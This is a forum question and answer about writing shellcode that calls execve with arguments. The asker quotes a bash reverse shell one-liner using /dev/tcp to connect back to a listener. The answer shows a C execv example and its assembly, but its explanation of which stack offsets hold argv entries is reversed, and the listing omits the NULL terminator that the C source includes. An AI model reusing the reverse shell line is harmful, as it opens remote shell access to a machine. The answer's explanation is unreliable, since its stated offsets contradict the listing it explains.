
I'm having a go at learning assembly and writing shellcode. I have a question about execve and passing arguments to the program it will execute.

I have working code to execute a bash shell but am unsure of the input format of execve to pass additional arguments to it. Can I do stdin stdout redirects too? I wanted to create a reverse tcp connection with this type of command line:

/bin/bash -i >& /dev/tcp/192.168.1.4/1234 0>&1

Should the arguments be separated with NULLs? I got it to execute a shell but it didn't connect back to the listening nc.

I know this is an unusual way of doing this but I just wanted to try something different :-)

Cheers


1 Answer


The best way to find out how to do it is to compile an example and stop at the assembly level. Let's take this example:

#include <unistd.h>

int
main ()
{
  char *program = "/bin/ls";
  /* argv must end with a NULL pointer: execv(2) takes no count and
     walks the array until it finds that terminator */
  char *args[] = {"/bin/ls", "-l", "./", NULL};

  execv(program, args);

  return 0;
}

After compiling with gcc -Wall -Wextra -S -o myexec.s myexec.c you can read myexec.s:

        .file   "myexec.c"
        .section        .rodata
.LC0:
        .string "/bin/ls"
.LC1:
        .string "-l"
.LC2:
        .string "./"
        .text
        .globl  main
        .type   main, @function
main:
.LFB0:
        pushq   %rbp
        movq    %rsp, %rbp
        subq    $32, %rsp
        movq    $.LC0, -8(%rbp)
        movq    $.LC0, -32(%rbp)
        movq    $.LC1, -24(%rbp)
        movq    $.LC2, -16(%rbp)
        leaq    -32(%rbp), %rdx
        movq    -8(%rbp), %rax
        movq    %rdx, %rsi
        movq    %rax, %rdi
        call    execv
        movl    $0, %eax
        leave
        ret

So the argument list of the command line consists of a list of strings: the first argument is the path to the executable (-8(%rbp)), and then each argument is passed through a pointer to its string: argv[0] = -16(%rbp), argv[1] = -24(%rbp), argv[2] = -32(%rbp), ... and so on.

So you only need to set this up the same way when calling execv.

Answered 2013-04-19T12:59:11.090